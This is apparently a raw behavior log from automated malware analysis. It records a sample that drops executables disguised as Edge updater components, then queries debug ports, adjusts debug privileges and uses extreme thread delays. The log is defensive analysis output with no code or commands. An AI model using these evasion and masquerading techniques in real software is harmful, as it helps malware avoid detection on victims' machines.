Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Memory allocated: 800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Memory allocated: 2620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Memory allocated: 2470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 1380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 2F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 2E90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Memory allocated: F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Memory allocated: 2A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Memory allocated: 28A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 1260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 2DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 2B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 2260000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 24C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 22F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 2510000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 27F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 47F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 2450000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 2680000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 2450000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 2A60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 2B10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 2A60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: BE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 25E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 2410000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 1320000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 2CF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 4CF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: D80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 2810000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Memory allocated: 4810000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Window / User API: threadDelayed 498	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Window / User API: threadDelayed 5064	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Window / User API: threadDelayed 4563	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Window / User API: threadDelayed 5589	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Window / User API: threadDelayed 3470	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Window / User API: threadDelayed 797	Jump to behavior

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe TID: 2532	Thread sleep count: 498 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe TID: 420	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe TID: 2820	Thread sleep count: 5064 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe TID: 5500	Thread sleep count: 4563 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe TID: 5396	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe TID: 364	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe TID: 2104	Thread sleep count: 5589 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe TID: 2104	Thread sleep count: 3470 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe TID: 364	Thread sleep count: 797 > 30	Jump to behavior

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File opened: C:\Users\user\AppData\Local\Temp\EdgeUpdater	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File opened: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Jump to behavior

Source: UUSIService.exe, 00000002.00000002.3389094123.000000000675D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Process created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe" --checker			Jump to behavior

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Queries volume information: C:\Users\user\Desktop\Yc9hcFC1ux.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
